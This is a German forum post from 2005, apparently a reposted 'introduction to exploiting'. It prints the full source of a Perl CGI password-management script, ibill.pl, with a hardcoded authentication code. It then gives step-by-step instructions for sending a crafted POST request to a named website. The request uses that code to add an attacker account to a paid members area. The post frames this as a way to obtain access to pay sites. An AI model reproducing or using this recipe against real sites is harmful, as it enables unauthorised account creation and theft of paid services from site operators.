Einführung ins Exploiten

Dieses Thema im Forum "Security Tutorials" wurde erstellt von windose, 31. März 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 31. März 2005
    Hi all,

    Diese kleine Einführung wurde damals von Fl00da verfasst.

    Also ich "versuche" hier was zu erklären das ist verdammt schwer, aber ich will es trotzdem versuchen,
    es natürlich besser wenn man perl sprache beherscht dann hat man es vieeeel leichter,

    Also hier ist ein script:

    ibill.pl (den namen verändern Admins sehr oft, zb ibillpm.cgi usw, aber ist nicht scher zu bruten


    Code:
    #!/usr/bin/perl

    #########################################################################
    # please replace "/path/to/file with your password
    # file and "nOtl0g1c9l" with your authentication code
    #
    $pwdfile = "/path/to/.htpasswd"; # your password file
    $authpwd = "46229"; # your authentication number
    #
    #########################################################################

    #get the environment varianbles
    $method = $ENV{"REQUEST_METHOD"};
    $type = $ENV{"CONTENT_TYPE"};

    #if the script was called with the GET method, then send error
    if($method eq "GET") {
    &send_error("Invalid form post!!!");
    exit;
    }

    # check for the POST method and the HTML form's MIME-type
    if($method ne "POST" || $type ne "application/x-www-form-urlencoded") {
    &send_error("Web authorization code must come from a Form\n");
    exit;
    }

    # read form data from standard input
    %input_values = &get_form_tuples;

    $authcode = &normalize_query($input_values{"authpwd"});
    if($authcode ne $authpwd){
    &send_error("501"); # authentication failed
    exit;
    }

    $reqtype = &normalize_query($input_values{"reqtype"});
    if(!($reqtype eq "add" || $reqtype eq "delete" || $reqtype eq "chgpwd")){
    &send_error("502"); # invalid request type
    exit;
    }
    $username = &n
    ormalize_query($input_values{"username"});
    $password = &normalize_query($input_values{"password"});

    %users = &read_pwd_file();

    # add a user
    if ($reqtype eq "add"){
    if(!&valid_username($username)){
    send_error("507"); #invalid username
    exit;
    }
    if(!&valid_password($password)){
    send_error("508"); #invalid password
    exit;
    }
    if ($users{$username} ne ""){
    &send_error("505"); # specified user already exists
    exit;
    }
    $users{$username}=crypt($password,&get_key());
    &write_pwd_file();
    &send_success("201");
    exit;
    }

    #delete a user
    if ($reqtype eq "delete"){
    if(!&valid_username($username)){
    send_error("507"); #invalid username
    exit;
    }
    if ($users{$username} eq ""){
    &send_error("506"); # specified user doesn't exist
    exit;
    }
    delete $users{$username};
    &write_pwd_file();
    &send_success("202");
    exit;
    }

    #change the password of a user
    if ($reqtype eq "chgpwd"){
    if(!&valid_username($username)){
    send_error("507"); #invalid username
    exit;
    }
    if(!&valid_password($password)){
    send_error("508"); #invalid password
    exit;
    }
    if ($users{$username} eq ""){
    &send_error("506");
    exit;
    }
    $users{$username}= crypt($password,&get_key());
    &write_pwd_file();
    &send_success("203");
    exit;
    }

    # read CONTENT_LENGTH bytes from the standard input and decode
    # the URL format input, breaking it into an associative array
    # of HTML variable names and their values.
    sub get_form_tuples
    {
    local ($i);
    read(STDIN,$input,$ENV{'CONTENT_LENGTH'});
    @form_names = split('&',$input);
    foreach $i(@form_names) {
    ($html_name,$html_value) = split('=',$i);
    $input_values{$html_name} = $html_value;
    }
    return %input_values;
    }

    # URL syntax converts most non-alphanumeric characters into a
    # percentage sign, followed by the character's value in hex.
    sub normalize_query {
    local($value) = @_;
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C",hex($1))/eg;
    return $value;
    }

    # Send error messages
    sub send_error
    {
    print "Content-type: text/plain\n\n";
    print "@_\n"
    }

    # Send error messages
    sub send_success
    {
    print "Content-type: text/plain\n\n";
    print "@_\n"
    }

    # read the password file and create an associative array
    sub read_pwd_file
    {
    if($pwdfile eq ""){
    &send_error("503"); #failed to locate the password file
    exit;
    }
    #open password file
    unless(open(PWD,$pwdfile)){
    &send_error("504"); #failed to open the password file
    exit;
    }
    flock(PWD,$LOCK_EX);
    seek(PWD,0,0);
    while(<PWD>){
    if (index($_,":") >= 0){
    ($cuser,$cpwd) = split(':',$_);
    chop($cpwd);
    if($users{$cuser} ne ""){
    &send_error("Duplicate user '" . $cuser . "' found\n");
    exit;
    }
    $users{$cuser}=$cpwd;
    }
    }
    flock(CFG,$L
    OCK_UN);
    close(CFG);

    return %users;
    }

    # write the associative array to password file
    sub write_pwd_file
    {
    if($pwdfile eq ""){
    &send_error("503"); #failed to locate the password file
    exit;
    }
    #open password file
    unless(open(PWD,">" . $pwdfile)){
    &send_error("504"); #failed to open the password file
    exit;
    }
    flock(PWD,$LOCK_EX);
    seek(PWD,0,0);
    foreach $user (keys %users){
    $temp = $temp . $user . " :: " . $users{$user} . "\n";
    print PWD $user . ":" . $users{$user} . "\n";
    }
    flock(PWD,$LOCK_UN);
    close(PWD);
    }

    # generates a random salt for crypt function
    sub get_key
    {
    $chars[0] = chr(65+int(rand(26)));
    $chars[1] = chr(97+int(rand(26)));
    $chars[2] = chr(48+int(rand(9)));

    $key = $chars[int(rand(3))] . $chars[int(rand(3))];

    return $key;
    }

    # returns 0 if the 'username' is not a valid one. otherwise
    # returns 1
    sub valid_username()
    {
    local($usr)=@_;
    local($res)=1;

    if(length($usr) < 3){
    $res=0;
    }
    if($usr =~ /\s/) {
    $res=0;
    }
    if($usr =~ /\W/){
    $res=0;
    }
    return $res;
    }

    # returns 0 if the 'password' is not a valid one. otherwise
    # returns 1
    sub valid_password()
    {
    local($pwd)=@_;
    local($res)=1;

    if(length($pwd) < 3){
    $res=0;
    }
    if($pwd =~ /\s/) {
    $res=0;
    }
    return $res;
    }




    Was machen wir jez?
    Wir öffnen AD auf, gehe auf "Extra Tools" und dann auf "Http Debuger"
    schreib in HTTP Adresse: http://www.britishnylons.com/cgi-bin/ibillpm.pl

    Rechts (Mode) clicken auf "POST" Dann "Use Proxys" und gan unten "Post DATA" aktiviren.
    und dahin:
    authpwd=46229&reqtype=add&username=RAIDRUSHCREW&password=RULEZ

    screiben und auf "connect" drücken, und schon können wir members zone mit
    RAIDRUSHCREW:RULEZ beitretten

    Wie habsch es geschaft post data zu finden? Das werde ich jez kurz erklären,

    Gucken wir und den script ma an:



    $authcode = &normalize_query($input_values{"authpwd"}); <- authpwd, password komm zu erst
    if($authcode ne $authpwd){
    &send_error("501"); # authentication failed
    exit;
    }

    danach



    $reqtype = &normalize_query($input_values{"reqtype"}); < befehl,
    if(!($reqtype eq "add" || $reqtype eq "delete" || $reqtype eq "chgpwd")){ <- add oder delete oder chgpwd (password wechseln
    &send_error("502"); # invalid request type
    exit;
    }

    und ganz am ende:

    $username = &n
    ormalize_query($input_values{"username"}); <- usename is kla
    $password = &normalize_query($input_values{"password"}); <- und password

    PS: Alles was in "" war schreiben wir in Post data rein

    ganz oben finden wir passe von admin:

    $authpwd = "46229";

    Das wars
    mfg

    die dose

    PS: Wofür man so etwasa braucht?z.B. Eure beliebten deluxepass`es.............
     
  2. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.